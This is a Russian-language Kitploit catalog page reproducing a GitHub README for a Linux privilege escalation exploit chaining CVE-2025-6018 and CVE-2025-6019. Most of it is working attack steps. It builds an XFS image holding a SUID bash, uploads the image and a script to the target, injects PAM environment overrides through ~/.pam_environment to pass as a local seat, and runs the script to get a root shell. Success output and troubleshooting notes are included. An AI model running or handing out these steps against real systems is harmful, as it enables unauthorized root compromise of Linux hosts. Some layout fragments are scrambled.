Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — Пошаговый эксплойт для повышения привилегий для CVE-2025-6018 и CVE-2025-6019 с использованием манипуляции образами XFS и инъекции переменных окружения PAM для получения root-доступа в Linux-системах. | Kitploit
Инструменты/GitHubGitHub/ioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

Пошаговый эксплойт для повышения привилегий для CVE-2025-6018 и CVE-2025-6019 с использованием манипуляции образами XFS и инъекции переменных окружения PAM для получения root-доступа в Linux-системах.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

CVE-2025-6018 + CVE-2025-6019 Руководство по повышению привилегий

📋 Быстрые шаги эксплуатации

Шаг 1: Подготовка образа XFS (локальная машина)

root@kitploit:~
# Создание образа XFS размером 300 МБ
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Монтирование и установка SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Проверка (должно отображаться 300M)
ls -lh xfs.image

Шаг 2: Загрузка файлов на цель

root@kitploit:~
# Загрузка эксплойта и образа
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Шаг 3: Первый вход — настройка PAM

root@kitploit:~
# Вход по SSH на цель
ssh [email protected]

# Запись переменных окружения PAM
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Проверка конфигурации
cat ~/.pam_environment

# 🔥 Критично: Выйдите (для активации конфигурации PAM)
exit

Шаг 4: Второй вход — выполнение повышения привилегий

root@kitploit:~
# Повторный вход по SSH (конфигурация PAM теперь активна)
ssh [email protected]

# Проверка активности PAM (должно вернуть "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Запуск скрипта повышения привилегий
bash exp.sh

✅ Индикаторы успеха

Если эксплуатация прошла успешно, вы должны увидеть:

root@kitploit:~
✓ SUID bash найден: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Доступ root подтвержден!

════════════════════════════════════════════════════════════
║ ФЛАГ ROOT                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Устранение неполадок

ПроблемаРешение
CanReboot возвращает

📌 Ключевые моменты

  • ✅ Необходимо выйти и войти снова: конфигурация PAM вступает в силу только в новых сессиях
  • ✅ Проверьте CanReboot: убедитесь, что он возвращает ('yes',) перед запуском скрипта
  • ✅ Используйте вход по SSH: не используйте выполнение в стиле ssh -t user@host "cmd"

🐱 Кот-хранитель

Если не работает, убедитесь, что каждый шаг выполняется строго по порядку!

Скачать инструмент
('no',)
Убедитесь, что вы вышли и вошли снова (Шаг 3)
Ошибка Not authorizedПроверьте, что содержимое ~/.pam_environment правильное
SUID bash не найденПовторно загрузите xfs.image и убедитесь, что SUID бит установлен